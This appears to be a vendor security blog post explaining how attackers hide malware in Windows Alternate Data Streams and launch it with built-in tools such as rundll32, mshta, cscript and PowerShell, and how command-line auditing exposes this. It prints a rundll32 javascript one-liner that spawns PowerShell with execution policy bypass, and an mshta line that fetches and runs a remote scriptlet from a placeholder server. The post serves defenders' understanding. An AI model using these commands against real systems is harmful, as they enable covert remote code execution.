Varonis announces strategic partnership with Microsoft to accelerate the secure adoption of Copilot.

Learn more

The Malware Hiding in Your Windows System32 Folder: More Alternate Data Streams and Rundll32

Last time, we saw how sneaky hackers can copy malware into the Alternate Data Stream (ADS) associated with a Windows file. I showed how this can be done with the...
Michael Buckbee
4 min read
Published July 2, 2018
Last updated July 14, 2022

Last time, we saw how sneaky hackers can copy malware into the Alternate Data Stream (ADS) associated with a Windows file. I showed how this can be done with the ancient type command. As it turns out, there are a few other Windows utilities that also let you copy into an ADS.

For example, extract, expand, and our old friend certutil are all capable of performing this ADS trick. For a complete list of these secret file-copying binaries, check out Oddvar Moe’s latest gist.

Get the Free Pen Testing Active Directory Environments EBook

 
“This really opened my eyes to AD security in a way defensive work never did.”

In my testing, I used extract to copy an evil Javascript malware into the ADS of a .doc file.

expand

 

In the old command shell, dir /r shows you the ADS for each file.

Ready, Set, Launch

This brings up a larger point about Windows utilities: they can perform multiple functions — some of them less well known than others. In fact, the aforementioned utilities listed by Oddvar are all capable of a normal file copy as well as the ADS variant.

This is not a revelation in itself. However, it does means that security monitoring software that’s trying to detect, say, an unusual file copy or transfer can’t just rely on searching the Windows Event logs for a “copy” in the command line. Living-off-the-land (LoL) is all about trickery and making it harder for the defense to understand their IT systems are even under an attack.

This leads to a favorite topic of the IOS blog: security software that doesn’t have visibility into the underlying file systems structures can be easily tricked by hackers. Oh wait, there just happens to be a solution that looks under the file system hood and so won’t be taken in by these LoL techniques.

Let’s get back to the actual execution of the evil malware embedded in the ADS. There are a few ways to accomplish this. You can embed JavaScript, as I did last time, and then execute the ADS using wscript, the Windows-based app that runs scripting engine.

For kicks, I tried cscript, which is the command-line version, and you can gaze on the GIF I created of my hacking session:

 

ads-cs2_edit_0

You are getting sleepy as you watch this GIF showing JavaScript malware launched from the ADS. Sleepy.

Can you embed an HTA file and launch the malware with mshta? Affirmative.

And PowerShell works fine as well. Oddvar Moe also has a great post enumerating different ways to launch executables from the ADS. Thanks (again) Oddvar!

Back to the Event Logs

I confess to being a little reluctant to turn on more granular event auditing on my Virtual Box environment – it’s already a sluggish thing as it is.

I threw caution to the wind, and enabled the command line auditing setting, which can be found buried in the GPO console under \Computer Configuration\Administrative Templates\System\Audit Process Creation. Now, I’ll be able to see command line arguments for every process that’s launched. And having previously enabled PowerShell command logging, I’ll be faced with an embarrassment of logging riches.

To its credit, Windows logs very detailed information — for example, the ADS I referenced when I launched my aforementioned evil JavaScript:

Got you! With command line auditing, the reference to the JavaScript hidden in the ADS is now visible for all to see in log.

There’s also a log entry displaying the actual PowerShell code (launched by the JavaScript) — in my scenario, it pulls down a remote PowerShell script and then executes it:

Hmmm, a PowerShell session that downloads and executes a remote script. Wonder if it’s connected with JavaScript in the ADS file?

Even with all this extra information in the log, it’s still not necessarily an easy task — there are tools to help, of course — to correlate these two separate events, the cscript and the PowerShell session, and then determine that there’s abnormal activities taking place.

One More Thing: Rundll32 and Command Line JavasScript

If you don’t enable Windows granular command line tracking and PowerShell auditing for performance reasons, then data security monitoring and incident detection becomes almost impossible when faced with  malware-free techniques used by hackers. To add to the security conundrum, hackers have even more tricks up their virtual sleeves to make life difficult for IT security groups.

Some Lol-ware that accepts a local script file or remote URL reference — for example, mshta — also allows raw JavaScript (or VBScript) to be passed into the command line!

I’ve not mentioned rundll32 before, but it’s a LoL binary that has this direct JavaScript capability. The following bit of script using rundll32 does as advertised — launching a PowerShell session that then writes a little “Boo” message. In real world hacking, this message would be replaced with the first step in the attack.

  1. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c write-host BooHaaa!");
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c write-host BooHaaa!");

Infosec analysts who are searching through raw Windows logs on a server in which granular auditing has been disabled will have a difficult time working out a connection between a rundll32 process event and a subsequent PowerShell event. Unless they’ve read this post!

There’s still more.

Remember scriplets, those bits of JavaScript that can be treated like COM objects?

So … here’s a great one-liner that uses GetObject to pull in a remote scriptlet and then execute it locally. You just need a small bit of JavaScript (or VBScript) to call the GetObject method. Both rundll32 and mshta can accept the script directly. And the mshta version using VBScript to call GetObject is as follows:

  1. mshta vbscript:Close(Execute("GetObject(""script:http://yourserver/thing.sct"")"))
mshta vbscript:Close(Execute("GetObject(""script:http://yourserver/thing.sct"")"))

Basta!

I think we’ve covered enough ground in this post. At the end of day, I’m presenting different ways hackers can inflict pain on a beleaguered IT security group. If you’re looking for homework till next time, you can ponder these last two scripts, and study this Stack Overflow article explaining how rundll32 does its magic. We’ll take another look at rundll32, and I’ll chat about some ways to protect against this hacker voodoo.

 

 

 

 

 

 

What you should do now

Below are three ways we can help you begin your journey to reducing data risk at your company:

  1. Schedule a demo session with us, where we can show you around, answer your questions, and help you see if Varonis is right for you.
  2. Download our free report and learn the risks associated with SaaS data exposure.
  3. Share this blog post with someone you know who'd enjoy reading it. Share it with them via email, LinkedIn, Reddit, or Facebook.

Try Varonis free.

Get a detailed data risk report based on your company’s data.
Deploys in minutes.

Keep reading

Varonis tackles hundreds of use cases, making it the ultimate platform to stop data breaches and ensure compliance.

the-malware-hiding-in-your-windows-system32-folder:-more-rundll32-and-lol-security-defense-tips
The Malware Hiding in Your Windows System32 Folder: More Rundll32 and LoL Security Defense Tips
When we left off last, I showed how it’s possible to run VBScript directly from mshta. I can play a similar trick with another LoL-ware binary, our old friend rundll32....
the-malware-hiding-in-your-windows-system32-folder:-certutil-and-alternate-data-streams
The Malware Hiding in Your Windows System32 Folder: Certutil and Alternate Data Streams
We don’t like to think that the core Window binaries on our servers are disguised malware, but it’s not such a strange idea. OS tools such as regsrv32 and mshta...
the-malware-hiding-in-your-windows-system32-folder:-mshta,-hta,-and-ransomware
The Malware Hiding in Your Windows System32 Folder: Mshta, HTA, and Ransomware
The LoL approach to hacking is a lot like the “travel light” philosophy for tourists. Don’t bring anything to your destination that you can’t find or inexpensively purchase once you’re…
the-malware-hiding-in-your-windows-system32-folder:-intro-to-regsvr32
The Malware Hiding in Your Windows System32 Folder: Intro to Regsvr32
In our epic series on Malware-Free Hacking, I wrote about techniques that let you use well-known Microsoft apps and tools to run evil custom scripts. This file-less hack-craft usually involves sneaking...